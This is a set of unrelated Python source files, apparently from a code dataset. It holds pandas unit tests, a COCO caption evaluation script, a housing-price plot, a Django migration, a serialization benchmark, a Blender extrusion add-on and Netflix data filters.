task = CleanNationalDataset(self.config["collector"], Store())
task(input_folder="raw", output_folder="interim")
mock_list.assert_called_once_with("raw/*.csv")
mock_read.assert_called_once_with("raw/1970-01-01.csv")
mock_write.assert_called_once_with(
mock.ANY, "interim/1970-01-01.csv", index=False
)
pd.testing.assert_frame_equal(
mock_write.call_args.args[0],
pd.DataFrame(
{
"PositiefGetest": [1000],
"Opgenomen": [2000],
"Overleden": [3000],
"Datum": ["1970-01-01"],
}
),
check_dtype=False,
)
class TestCleanNationalDatasetRead:
@mock.patch.object(Store, "open")
@mock.patch.object(pd, "read_csv")
def test_read(self, mock_read_csv, mock_open):
# pylint: disable=protected-access
task = CleanNationalDataset(None, Store())
task._read("test.csv", delimiter=",")
mock_read_csv.assert_called_once_with(mock.ANY, delimiter=",")
mock_open.assert_called_once_with("test.csv", "r")
class TestCleanNationalDatasetWrite:
@mock.patch.object(Store, "open")
@mock.patch.object(pd.DataFrame, "to_csv")
def test_write(self, mock_to_csv, mock_open):
# pylint: disable=protected-access
task = CleanNationalDataset(None, Store())
task._write(pd.DataFrame(np.zeros(shape=(3, 3))), "test.csv", index=False)
mock_to_csv.assert_called_once_with(mock.ANY, index=False)
mock_open.assert_called_once_with("test.csv", "w")
|
19,288 | e3cd5749601243573e6e699c2f73fceb78da3fca |
import argparse
from src.coco_caption.pycocotools.coco import COCO
from src.coco_caption.pycocoevalcap.eval import COCOEvalCap
import pylab
pylab.rcParams['figure.figsize'] = (10.0, 8.0)
import json
from json import encoder
encoder.FLOAT_REPR = lambda o: format(o, '.3f')
def load_json(json_path):
with open(json_path, 'r') as outfile:
return json.load(outfile)
def save_json(data, output_json):
with open(output_json, 'w') as outfile:
json.dump(data, outfile, sort_keys=True, indent=4, ensure_ascii=False)
def convert_result(result_json):
res = load_json(result_json)
collect = []
for item in res:
new = {}
new['image_id'] = int(str(item['image_id']).lstrip('0'))
new['caption'] = ' '.join([i for i in item['caption'].split(' ') if 'sentence_' not in i])
collect.append(new)
save_json(collect, result_json)
print('converted json saved')
def calculate_metrics(generated_captions_file, true_captions_file):
coco = COCO(true_captions_file)
cocoRes = coco.loadRes(generated_captions_file)
cocoEval = COCOEvalCap(coco, cocoRes)
cocoEval.params['image_id'] = cocoRes.getImgIds()
cocoEval.evaluate()
for metric, score in cocoEval.eval.items():
print '%s: %.3f' % (metric, score)
return coco, cocoEval, cocoRes
def main(generated_captions_file, true_captions_file):
convert_result(generated_captions_file)
calculate_metrics(generated_captions_file, true_captions_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Input Arguments
parser.add_argument(
'--captions-file',
help='JSON file with generated captions and image IDs',
required=True
)
args = parser.parse_args()
arguments = args.__dict__
true_captions_file = 'src/coco_caption/annotations/captions_val2014.json'
main(arguments['captions_file'], true_captions_file)
|
19,289 | f08dd80159a787a6543048c9fae9d95cb14eb2e5 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
from matplotlib.mlab import csv2rec
from matplotlib.cbook import get_sample_data
import json
import functions as func
import sys,os
from pylab import *
Y_start=5000
Y_end=50000
space_of_Y=1000
#mpl.rcParams['font.sans-serif'] = ['simhei']
myfont = matplotlib.font_manager.FontProperties(fname='/root/simhei.ttf')
mpl.rcParams['axes.unicode_minus'] = False
# fname = get_sample_data('percent_bachelors_degrees_women_usa.csv')
# gender_degree_data = csv2rec(fname)
aa = json.loads(open("/tmp/second_and_more_cities.txt").read())
# These are the colors that will be used in the plot
color_sequence = ['#1f77b4', '#aec7e8', '#ff7f0e', '#ffbb78', '#2ca02c',
'#98df8a', '#d62728', '#ff9896', '#9467bd', '#c5b0d5',
'#8c564b', '#c49c94', '#e377c2', '#f7b6d2', '#7f7f7f',
'#c7c7c7', '#bcbd22', '#dbdb8d', '#17becf', '#9edae5']
# You typically want your plot to be ~1.33x wider than tall. This plot
# is a rare exception because of the number of lines being plotted on it.
# Common sizes: (10, 7.5) and (12, 9)
fig, ax = plt.subplots(1, 1, figsize=(12, 14))
# Remove the plot frame lines. They are unnecessary here.
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# Ensure that the axis ticks only show up on the bottom and left of the plot.
# Ticks on the right and top of the plot are generally unnecessary.
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# Limit the range of the plot to only where the data is.
# Avoid unnecessary whitespace.
# plt.xlim(1968.5, 2011.1)
# plt.ylim(-0.25, 90)
plt.xlim(0, 25)
plt.ylim(Y_start, Y_end)
# Make sure your axis ticks are large enough to be easily read.
# You don't want your viewers squinting to read your plot.
plt.xticks(range(0, 24, 1), fontsize=14)
# plt.yticks(range(0, 91, 10), ['{0}%'.format(x)
# for x in range(0, 91, 10)], fontsize=14)
plt.yticks(range(Y_start, Y_end, space_of_Y), fontsize=14)
# Provide tick lines across the plot to help your viewers trace along
# the axis ticks. Make sure that the lines are light and small so they
# don't obscure the primary data lines.
for y in range(Y_start, Y_end, space_of_Y):
plt.plot(range(0, 24, 1), [y] * len(range(0, 24, 1)), '--',
lw=0.5, color='black', alpha=0.3)
# Remove the tick marks; they are unnecessary with the tick lines we just
# plotted.
plt.tick_params(axis='both', which='both', bottom='off', top='off',
labelbottom='on', left='off', right='off', labelleft='on')
# Now that the plot is prepared, it's time to actually plot the data!
# Note that I plotted the majors in order of the highest % in the final year.
majors = ['Health Professions', 'Public Administration', 'Education',
'Psychology', 'Foreign Languages', 'English',
'Communications\nand Journalism', 'Art and Performance', 'Biology',
'Agriculture', 'Social Sciences and History', 'Business',
'Math and Statistics', 'Architecture', 'Physical Sciences',
'Computer Science', 'Engineering']
cities = ["北京","上海","广州","深圳","昆明","杭州","苏州","厦门","南京","西安","珠海","惠州","长沙","武汉","三亚"]
majors = []
for ti in cities:
majors.append("%s_二手房" % ti)
majors.append("%s_新房" % ti)
y_offsets = {'Foreign Languages': 0.5, 'English': -0.5,
'Communications\nand Journalism': 0.75,
'Art and Performance': -0.25, 'Agriculture': 1.25,
'Social Sciences and History': 0.25, 'Business': -0.75,
'Math and Statistics': 0.75, 'Architecture': -0.75,
'Computer Science': 0.75, 'Engineering': -0.25}
y_offsets = {u'北京_新房': 500, u"上海_二手房":-500, u"杭州_二手房":-100,u"广州_二手房":500,u"苏州_二手房":100,u"南京_二手房":-770,u"珠海_新房":-600,u"珠海_二手房":-500,u"昆明_二手房":800,u"昆明_新房":350,u"惠州_新房":-10,u"西安_二手房":-700,u"西安_新房":-1100,u"惠州_二手房":-1700,u"苏州_新房":-1200,u"南京_二手房":-800,u"长沙_二手房":50,"长沙_新房":10}
print len(y_offsets)
print len(majors)
print len(cities)
print len(color_sequence)
#sys.exit()
#func.a_list_of_date(func.get_this)
cc = func.get_this_month_first_day_to_last()[0].strftime("%Y-%m")
bb = func.a_list_of_date(cc,24)
bb.reverse()
for rank, column in enumerate(aa.keys()):
# Plot each line separately with its own color.
# column_rec_name = column.replace('\n', '_').replace(' ', '_').lower()
line = plt.plot([ft for ft in range(24)],
aa[column]['new'],
lw=2.5,
color=color_sequence[rank])
# Add a text label to the right end of every line. Most of the code below
# is adding specific offsets y position because some labels overlapped.
y_pos = int(aa[column]['new'][-1])
if u"%s_新房" % column in y_offsets:
y_pos += y_offsets[u"%s_新房" % column]
# Again, make sure that all labels are large enough to be easily read
# by the viewer.
plt.text(24, y_pos, "%s_%s" % (column,u"新房"), fontsize=9, color=color_sequence[rank],fontproperties=myfont)
# Plot each line separately with its own color.
# column_rec_name = column.replace('\n', '_').replace(' ', '_').lower()
line = plt.plot([ft for ft in range(24)],
aa[column]['second'],
lw=2.5,
color=color_sequence[-(rank+1)])
# Add a text label to the right end of every line. Most of the code below
# is adding specific offsets y position because some labels overlapped.
y_pos = int(aa[column]['second'][-1])
if u"%s_二手房" % column in y_offsets:
y_pos += y_offsets[u"%s_二手房" % column]
# Again, make sure that all labels are large enough to be easily read
# by the viewer.
plt.text(24, y_pos, "%s_%s" % (column,u"二手房"), fontsize=9, color=color_sequence[-(rank+1)],fontproperties=myfont)
# Make the title big enough so it spans the entire plot, but don't make it
# so big that it requires two lines to show.
# Note that if the title is descriptive enough, it is unnecessary to include
# axis labels; they are self-evident, in this plot's case.
plt.title(u'房价', fontsize=18, ha='center',fontproperties=myfont)
# Finally, save the figure as a PNG.
# You can also save it as a PDF, JPEG, etc.
# Just change the file extension in this call.
plt.savefig('second_and_more_cities.png', bbox_inches='tight')
|
19,290 | 576026485149dba9ef2346b1e4ddd3fda77f9b09 | # Generated by Django 3.0.3 on 2020-08-25 04:16
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Comuna',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comuna', models.CharField(choices=[('Namacunde', 'Namacunde'), ('Chiede', 'Chiede')], max_length=20)),
],
),
migrations.CreateModel(
name='Directivo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome_directivo', models.CharField(max_length=100, verbose_name='Nome do Chefe de Secção')),
('data_nascimento', models.DateField(verbose_name='Data de Nacimento')),
('empossamento', models.DateField(verbose_name='Data de Empossamento')),
('entrega_cargo', models.DateField(verbose_name='Data de Entrega do Cargo')),
('copia_bi', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name="'OBS: Só em formato PDF'")),
],
),
migrations.CreateModel(
name='Municipio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('municipio', models.CharField(choices=[('Namacunde', 'Namacunde')], max_length=12)),
],
),
migrations.CreateModel(
name='PessoaEmpresa',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome_requerente', models.CharField(blank=True, max_length=50, null=True, verbose_name='Requerente')),
('empresa', models.CharField(blank=True, max_length=70, null=True, verbose_name='Representado por')),
('data_nascimento', models.DateField(blank=True, null=True, verbose_name='Data de nascimento')),
('nome_pai', models.CharField(blank=True, max_length=100, null=True, verbose_name='Nome do Pai')),
('nome_mae', models.CharField(blank=True, max_length=100, null=True, verbose_name='Nome da mãe')),
('estado_civil', models.CharField(choices=[('Solteiro', 'Solteiro'), ('Casado', 'Casado'), ('Divorciado', 'Divorciado')], max_length=18, verbose_name='Estado Civil')),
('naturalidade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Naturalidade')),
('bi', models.CharField(blank=True, max_length=14, null=True, verbose_name='BI Nº')),
('copia_de_bi', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name="Cópia do BI'Só em formato PDF ou jpg'")),
('passado_bi', models.CharField(blank=True, max_length=50, null=True, verbose_name='Local de emissão')),
('residencia', models.CharField(blank=True, max_length=50, null=True, verbose_name='Residençia')),
('numero_casa', models.PositiveIntegerField(blank=True, null=True, verbose_name='Número da Casa')),
('sede', models.CharField(blank=True, max_length=100, null=True, verbose_name='Localização da Sede da Empresa')),
('email', models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email')),
('telefone', models.CharField(blank=True, max_length=12, null=True, verbose_name='Nº de Telefone')),
('comuna', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Comuna')),
('municipio', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Municipio')),
],
),
migrations.CreateModel(
name='Provincia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('provincia', models.CharField(choices=[('Cunene', 'Cunene')], max_length=10)),
],
),
migrations.CreateModel(
name='TerrenoLegalizar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('projecto', models.CharField(max_length=255, verbose_name='Nome do projecto')),
('localizacao', models.CharField(max_length=100, verbose_name='Local do projecto')),
('quarterao', models.CharField(max_length=100, verbose_name='Quarteirão')),
('data_entrada', models.DateField(auto_now_add=True)),
('pago_apreciado', models.DecimalField(decimal_places=2, max_digits=6, verbose_name='Pagamento de Preciação')),
('metros', models.PositiveIntegerField(blank=True, null=True, verbose_name='Extenção em metros quadrados')),
('comuna', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Comuna', verbose_name='Localidade/Bairro')),
('municipio', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Municipio', verbose_name='Municipio')),
('pessoaEmpresa', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pedido.PessoaEmpresa', verbose_name='Legalizador')),
('provincia_arquivacao', models.ForeignKey(max_length=100, on_delete=django.db.models.deletion.CASCADE, to='pedido.Provincia', verbose_name='Provincia de arquivação')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='pessoaempresa',
name='provincia',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Provincia'),
),
migrations.CreateModel(
name='Pago',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('parecer_tecnico', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions='pdf')], verbose_name="Parecer Técnico 'OBS: Só formato PDF'")),
('primeiro', models.FloatField(verbose_name='Primeira prestação')),
('recibo_primeiro', models.FileField(upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name="Recibo de deposito 'OBS: Solo formato PDF ou jpg'")),
('segundo', models.FloatField(default=0.0, verbose_name='Segunda Prestação')),
('recibo_segundo', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name='Só formato PDF ou jpg')),
('terceiro', models.FloatField(default=0.0, verbose_name='Terceira e última prestação')),
('recibo_terceiro', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name='Só formato PDF ou jpg')),
('processo_requerente', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions='pdf')], verbose_name="Processo do Requerente 'OBS: Só em formato PDF'")),
('projecto_legalizado', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='pedido.TerrenoLegalizar', verbose_name='Projecto Legalizado')),
],
),
migrations.AddField(
model_name='municipio',
name='provincia',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pedido.Provincia'),
),
migrations.AddField(
model_name='comuna',
name='municipio',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pedido.Municipio'),
),
]
|
19,291 | 5dd7caf2a1a1f0d398e4385c0bb00d468aa263db | import json, pickle, yaml, marshal
from collections import OrderedDict
import json, pickle, yaml, marshal
import timeit
with open (r"origin.yaml") as fp:
data = yaml.load(fp)
run = '''{unit}.dumps(data{method})'''
run_1 = '''{unit}.dump(data{method})'''
init = '''import {unit}
from __main__ import data'''
cmds = []
cmds.append((run.format(unit='json', method=''), init.format(unit='json', ext='json'), 'json'))
cmds.append((run_1.format(unit='yaml', method=''), init.format(unit='yaml', ext='yaml'), 'yaml'))
cmds.append((run.format(unit='pickle', method=',protocol=0'), init.format(unit='pickle', ext='pickle_v0'), 'pickle v0'))
cmds.append((run.format(unit='pickle', method=',protocol=1'), init.format(unit='pickle', ext='pickle_v1'), 'pickle v1'))
cmds.append((run.format(unit='pickle', method=',protocol=2'), init.format(unit='pickle', ext='pickle_v2'), 'pickle v2'))
cmds.append((run.format(unit='pickle', method=',protocol=3'), init.format(unit='pickle', ext='pickle_v3'), 'pickle v3'))
cmds.append((run.format(unit='pickle', method=',protocol=4'), init.format(unit='pickle', ext='pickle_v4'), 'pickle v4'))
cmds.append((run.format(unit='marshal', method=',0'), init.format(unit='marshal', ext='marshal_v0'), 'marshal v0'))
cmds.append((run.format(unit='marshal', method=',1'), init.format(unit='marshal', ext='marshal_v1'), 'marshal v1'))
cmds.append((run.format(unit='marshal', method=',2'), init.format(unit='marshal', ext='marshal_v2'), 'marshal v2'))
cmds.append((run.format(unit='marshal', method=',3'), init.format(unit='marshal', ext='marshal_v3'), 'marshal v3'))
cmds.append((run.format(unit='marshal', method=',4'), init.format(unit='marshal', ext='marshal_v4'), 'marshal v4'))
for run_cmd, init_cmd, title in cmds:
print('LOAD {}: '.format(title.upper()), min(timeit.Timer(stmt=run_cmd, setup=init_cmd).repeat(repeat=5, number=1)))
|
19,292 | 4e3362ef9fdce87e5197ea55fcdbc2d58619f7ef | # # -*- coding: UTF-8 -*-
import utils
t1 = utils.getTimeSec("2017-11-17 16:40:00")
t2 = utils.getTimeSec("2016-07-04 00:00:00")
print(t1, t2, t1-t2)
# import time
# import sys
# import binascii
# import uuid
# import socket
# import struct
# import os
# import math
# import decorator
# import shutil
#
# split = ''
#
# LOG_INTERVAL = 5
# class utils_py3(object):
# def __init__(self):
#
# # def getNow(self):
# # return int(time.time())
# #
# # def getDateSec(self,desc):
# # time_local = time.strptime(desc, '%Y%m%d')
# # return int(time.mktime(time_local))
# pass
#
# def getHMSec(desc):
# time_local = time.strptime(desc, '%H:%M')
# return time_local.tm_hour * 3600 + time_local.tm_min * 60
#
# def getDateSec(self,desc):
# time_local = time.strptime(desc, '%Y%m%d')
# return int(time.mktime(time_local))
# def getNow(self):
# return int(time.time())
# #001
#
# def getTimeDes(self,sec=None):
# if sec is None:
# sec = int(time.time())
# else:
# pass
# tplSec = time.localtime(sec)
# print('tplSec:',tplSec)
#
# return time.strftime('%Y-%m-%d %X',tplSec)
# #返回值为 :2017-11-02 19:20:08
# #002
#
# def getTimeDay(self,sec=None):
# if sec is None:
# sec = int(time.time())
# tplSec = time.localtime(sec)
# return '%04d-%02d-%02d' %tplSec[:3]
# #返回值:2017-11-02
# #003
# def getTimeSec(self,desc):
# if isinstance(desc,int):
# desc = str(desc)
# if len(desc) == 0:
# return self.getNow()
# if len(desc) <= 10:
# return self.getDateSec(desc)
# if desc.count('-') == 1:
# time_local = time.strptime(desc,'%Y%m%d-%H:%M:%S')
# elif desc.count('-') == 2:
# time_local = time.strptime(desc,'%Y-%m-%d %H:%M:%S')
# return int(time.mktime(time_local))
#
# class Logger(object):
# def __init__(self):
# self.lastPrintTime = 0
# self.log_file = None
#
# def _set_log_file(self,filename):
# self.log_file = open(filename,'w')
#
# def _reset_log_file(self,):
# if self.log_file:
# self.log_file.close()
# self.log_file = None
#
# def _print(self,msg):
# info = '%s : %s' %(self.getTimeDes(),msg)
#
#
#
#
#
# if __name__ == "__main__":
#
# test = utils_py3()
# # sec = int(time.mktime(time.strptime(time.time(),'%Y%m%d')))
# sec = '2017-11-02 20:23:37'
# sec2 = ''
# sec3 ='20171102'
# sec4 = '20171102-20:23:37'
# sec5 = 1509625923
# # print(sec)
# #001
# print(test.getTimeDes())
# #002
# print(test.getTimeDay())
# #003
# print(test.getTimeSec(sec))
# print(test.getTimeSec(sec2))
# print(test.getTimeSec(sec3))
# print(test.getTimeSec(sec4))
# print(test.getTimeSec(sec5))
# #4
# msg='1'
# logs = test.Logger()
# print(logs._print(msg))
#
|
19,293 | 1a4c96a5e3c519548badb6057d3a3953a0b863c0 | # Repeats extrusion, rotation, scale, movement for one or more faces.
# borrowed from user liero (http://blenderartists.org/forum/showthread.php?219526-Multiple-extrusions-script)
# original source: http://dl.dropbox.com/u/16486113/Blender/mexii.py
bl_info = {
"name": "Repeat Extrude",
"version": (1, 0, 0),
"blender": (2, 74, 0),
"location": "View3D > Tool Shelf",
"description": "Repeat extrusions from faces.",
'warning': '',
"category": "Mesh"}
import bpy
import bmesh
import random
import math
from math import radians
from random import gauss
from mathutils import Euler
from bpy.props import FloatProperty, BoolProperty, IntProperty
def vlocation(self, r):
random.seed(self.seed + r)
return random.gauss(0, self.var1 / 3)
def vrotation(self, r):
random.seed(self.seed + r)
return Euler((radians(self.rotx) + random.gauss(0, self.var2 / 3), \
radians(self.roty) + random.gauss(0, self.var2 / 3), \
radians(self.rotz) + random.gauss(0,self.var2 / 3)), 'XYZ')
class ScaleProperties(bpy.types.PropertyGroup):
scale = FloatProperty(name='Scale', min=0.1, soft_min=0.5, \
soft_max=1.2, max =2, default=.9, description='Scaling')
factor_type = bpy.props.EnumProperty(
items= (
('NONE', 'None', ''),
('LOG', 'Log', ''),
('LOGINVERSE', 'Log inverse', '')
),
name = "Factor type")
factor = FloatProperty(name='Factor', min=0.00005, soft_min=0.00005, \
soft_max=30, default=1, description='Factor')
def register_layout(self, layout, text):
column = layout.column(align=True)
column.label(text=text + ' scale:')
column.prop(self, 'scale', slider=True)
row = column.row(align=False)
row.prop(self, 'factor_type', expand=True)
column.prop(self, 'factor', slider=True)
def calculate_scale(self, repetitions, repetition, seed, scale_variance):
random.seed(seed + repetition)
result = self.scale * (1 + random.gauss(0, scale_variance / 3))
try:
if (self.factor_type == 'LOG'):
log = math.log(repetition)
if (log > 0):
result -= log * self.factor
if (self.factor_type == 'LOGINVERSE'):
log = math.log(repetitions - repetition)
if (log > 0):
result -= log * self.factor
except:
result = self.scale
return result
class OffsetProperties(bpy.types.PropertyGroup):
offset = FloatProperty(name='Offset', min=-85, soft_min=-30, \
soft_max=30, max=85, default=0, description='Offset')
factor_type = bpy.props.EnumProperty(
items= (
('NONE', 'None', ''),
('LOG', 'Log', ''),
('LOGINVERSE', 'Log inverse', '')
),
name = "Factor type")
factor = FloatProperty(name='Factor', min=0.00005, soft_min=0.00005, \
soft_max=30, default=1, description='Factor')
def register_layout(self, layout, text):
column = layout.column(align=True)
column.label(text=text + ' offset:')
column.prop(self, 'offset', slider=True)
row = column.row(align=False)
row.prop(self, 'factor_type', expand=True)
column.prop(self, 'factor', slider=True)
def calculate_offset(self, repetitions, repetition):
result = self.offset
try:
if (self.factor_type == 'LOG'):
log = math.log(repetition)
if (log > 0):
result -= log * self.factor
if (self.factor_type == 'LOGINVERSE'):
log = math.log(repetitions - repetition)
if (log > 0):
result -= log * self.factor
except:
result = self.offset
return result
class RepeatExtrude(bpy.types.Operator):
bl_idname = 'object.repeatextrude'
bl_label = 'Repeat Extrude'
bl_description = 'Repeat Extrude'
bl_options = {'REGISTER', 'UNDO'}
rotx = FloatProperty(name='Rot X', min=-85, soft_min=-30, \
soft_max=30, max=85, default=0, description='X rotation')
roty = FloatProperty(name='Rot Y', min=-85, soft_min=-30, \
soft_max=30, max=85, default=0, description='Y rotation')
rotz = FloatProperty(name='Rot Z', min=-85, soft_min=-30, \
soft_max=30, max=85, default=-0, description='Z rotation')
combined_scale_option = BoolProperty(name='Combined scale?')
combined_scale = bpy.props.PointerProperty(type=ScaleProperties)
x_offset = bpy.props.PointerProperty(type=OffsetProperties)
y_offset = bpy.props.PointerProperty(type=OffsetProperties)
z_offset = bpy.props.PointerProperty(type=OffsetProperties)
x_scale = bpy.props.PointerProperty(type=ScaleProperties)
y_scale = bpy.props.PointerProperty(type=ScaleProperties)
z_scale = bpy.props.PointerProperty(type=ScaleProperties)
var1 = FloatProperty(name='Offset Var', min=-5, soft_min=-1, \
soft_max=1, max=5, default=0, description='Offset variation')
var2 = FloatProperty(name='Rotation Var', min=-5, soft_min=-1, \
soft_max=1, max=5, default=0, description='Rotation variation')
scale_variance = FloatProperty(name='Scale Noise', min=-5, soft_min=-1, \
soft_max=1, max=5, default=0, description='Scaling noise')
repetitions = IntProperty(name='Repeat', min=1, max=50, soft_max=100, \
default=5, description='Repetitions')
seed = IntProperty(name='Seed', min=-9999, max=9999, default=0, \
description='Seed to feed random values')
@classmethod
def poll(cls, context):
obj = context.object
return (obj and obj.type == 'MESH')
def draw(self, context):
layout = self.layout
column = layout.column(align=True)
column.label(text='Transformations:')
column.prop(self, 'rotx', slider=True)
column.prop(self, 'roty', slider=True)
column.prop(self, 'rotz', slider=True)
self.x_offset.register_layout(layout, 'X')
self.y_offset.register_layout(layout, 'Y')
self.z_offset.register_layout(layout, 'Z')
layout.prop(self, 'combined_scale_option')
if (self.combined_scale_option):
self.combined_scale.register_layout(layout, 'Combined')
else:
self.x_scale.register_layout(layout, 'X')
self.y_scale.register_layout(layout, 'Y')
self.z_scale.register_layout(layout, 'Z')
column = layout.column(align=True)
column.label(text='Variation settings:')
column.prop(self, 'var1', slider=True)
column.prop(self, 'var2', slider=True)
column.prop(self, 'scale_variance', slider=True)
column.prop(self, 'seed')
column = layout.column(align=False)
column.prop(self, 'repetitions')
def execute(self, context):
obj = bpy.context.object
mode = obj.mode
mw = obj.matrix_world
bpy.context.tool_settings.mesh_select_mode = [False, False, True]
# bmesh operations
bpy.ops.object.mode_set()
bm = bmesh.new()
bm.from_mesh(obj.data)
selectedFaces = [f for f in bm.faces if f.select]
# faces loop
for i, selectedFace in enumerate(selectedFaces):
rotation = vrotation(self, i)
location = vlocation(self, i)
selectedFace.normal_update()
# extrusion loop
for repetition in range(self.repetitions):
newFace = selectedFace.copy()
newFace.normal_update()
newFaceNormal = newFace.normal.copy()
newFaceCenterBounds = newFace.calc_center_bounds()
if (self.combined_scale_option):
xscale = self.combined_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
yscale = xscale
zscale = xscale
else:
xscale = self.x_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
yscale = self.y_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
zscale = self.z_scale.calculate_scale(self.repetitions, repetition, self.seed, self.scale_variance)
for v in newFace.verts:
v.co.rotate(rotation)
v.co += newFaceNormal * location
v.co = v.co.lerp(newFaceCenterBounds, 0)
v.co.x += self.x_offset.calculate_offset(self.repetitions, repetition)
v.co.y += self.y_offset.calculate_offset(self.repetitions, repetition)
v.co.z += self.z_offset.calculate_offset(self.repetitions, repetition)
bmesh.ops.scale(
bm,
vec=(xscale, yscale, zscale),
verts=newFace.verts
)
# extrude code from TrumanBlending
for a, b in zip(selectedFace.loops, newFace.loops):
sf = bm.faces.new((a.vert, a.link_loop_next.vert, \
b.link_loop_next.vert, b.vert))
sf.normal_update()
bm.faces.remove(selectedFace)
newFace.select_set(True)
selectedFace = newFace
for v in bm.verts: v.select = False
for e in bm.edges: e.select = False
bm.to_mesh(obj.data)
obj.data.update()
# restore user settings
bpy.ops.object.mode_set(mode=mode)
if not len(selectedFaces):
self.report({'INFO'}, 'Please select one or more faces.')
return{'FINISHED'}
class RepeatExtrudeToolButton(bpy.types.Panel):
bl_label = 'Repeat Extrude'
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
def draw(self, context):
layout = self.layout
layout.operator('object.repeatextrude')
def register():
bpy.utils.register_class(ScaleProperties)
bpy.utils.register_class(OffsetProperties)
bpy.utils.register_class(RepeatExtrude)
bpy.utils.register_class(RepeatExtrudeToolButton)
def unregister():
bpy.utils.unregister_class(RepeatExtrudeToolButton)
bpy.utils.unregister_class(RepeatExtrude)
bpy.utils.register_class(OffsetProperties)
bpy.utils.register_class(ScaleProperties)
if __name__ == '__main__':
register()
|
19,294 | f39060cdb929b81a9b1ccbd897b794615125a359 | #!/usr/bin/python3
import pandas as pd
"""
@author Arturo Negreiros
"""
PATH = "practices/netflix_titles.csv"
def duration_filter(duration):
return int(duration.split(" ")[0]) <= 100
def main():
netflix = pd.read_csv(PATH)
headers = list()
rating = list()
for x in netflix:
headers.append(x)
for y in netflix['rating']:
if y not in rating:
rating.append(y)
print("""
The headers:
'show_id' 'type' 'title' 'director'
'cast' 'country' 'date_added' 'release_year'
'rating' 'duration' 'listed_in' 'description'
Rating or classification about the content:
NR & UR Not rated or Un rated, generally is
because, the content of the film
was not shipped with the classification properly
and the actual content would be not properly to
children
TV-PG Guidance Parental suggested
TV-Y7 Children Public for 7 years old
TV-Y Children Public, under 6 years old
G General Audience
TV-G General Audience
PG Parental Guidance Suggested
PG-13 Parents Strongly Cautioned
R Restricted
NC-17 Adults Only
TV-MA Olders than 17
TV-14 Olders than 14 Parental Guidance Suggested
TV-Y7-FV Chill audience with fiction violence and strong emotions
Type:
Tv-Show or Movie
""")
print("""
Setting some filters about the rating for olders than 17 years old
generating filters for the country => United States
Type movie""")
print(netflix[
(netflix['country'] == 'United States') & (netflix['type'] == 'Movie') & (netflix['rating'] == 'R') & (
netflix['duration'].apply(lambda x: duration_filter(x)))][['title', 'rating', 'duration']])
def review_data():
netflix = pd.read_csv("practices/netflix_titles.csv")
# sns.pilot(netflix, hue="type")
# plt.show()
# print(netflix)
def filter_viewing_data(title):
return "murder" in title.lower().split(" ")
data_frame = netflix[(netflix['title'].apply(lambda x: filter_viewing_data(x))) & (netflix['country'] == 'United '
'States')][
['title', 'release_year', 'rating']]
data_frame['relase_year'] = pd.to_numeric(data_frame['release_year'])
print(data_frame) # printing the data by country and the murder word in the title
def filtering_by_duration():
netflix = pd.read_csv("practices/netflix_titles.csv")
def filter_by_duration(duration):
return int(duration.split(" ")[0]) == 100
def filter_by_country(country):
return country == "United States"
netflix_filtered = netflix[(netflix['country'].apply(lambda x: filter_by_country(x))) & (
netflix['duration'].apply(lambda y: filter_by_duration(y)))]
print(netflix_filtered[['title', 'description']])
if __name__ == '__main__':
# main()
# review_data()
filtering_by_duration()
|
19,295 | 1f617ff65f1f239f07b8ebbe33d0216eb586ad27 | #!/usr/bin/python
